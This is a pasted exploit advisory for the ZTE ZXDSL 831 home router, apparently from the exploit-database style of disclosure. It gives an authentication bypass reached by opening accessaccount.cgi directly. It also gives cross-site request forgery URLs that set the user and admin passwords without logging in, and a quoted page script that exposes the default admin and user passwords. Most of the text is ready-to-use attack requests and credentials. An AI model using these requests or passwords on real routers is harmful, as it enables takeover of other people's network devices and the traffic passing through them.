Advertisement
Guest User

Untitled

a guest
Mar 4th, 2019
234
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. # Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities
  2. # Date: 28 / 10 / 2011 .
  3. # Authors: Mehdi Boukazoula ; Ibrahim Debeche .
  4. # Software Link with patch :
  5. # Version: v 831IIV7.5.0a_Z29_OV
  6. # Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !!
  7. # Description :
  8.  
  9. 1 - Authentication bypass + Cross Site Request forgery
  10. To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
  11. To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator :
  12.  
  13. USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
  14. ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111
  15.  
  16. 2 - Script revealing sensitive information on source of page "accessaccount.cgi":
  17.  
  18. function frmLoad()
  19. {
  20. with ( document.forms.adminaccount ) {
  21. sysUserName.value = 'admin';
  22. sysPassword.value = '43210';
  23. syscfmPwd.value = '43210';
  24.  
  25. usrUserName.value = 'user';
  26. usrPassword.value = '111111';
  27. usrcfmPwd.value = '111111';
  28. }
  29. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement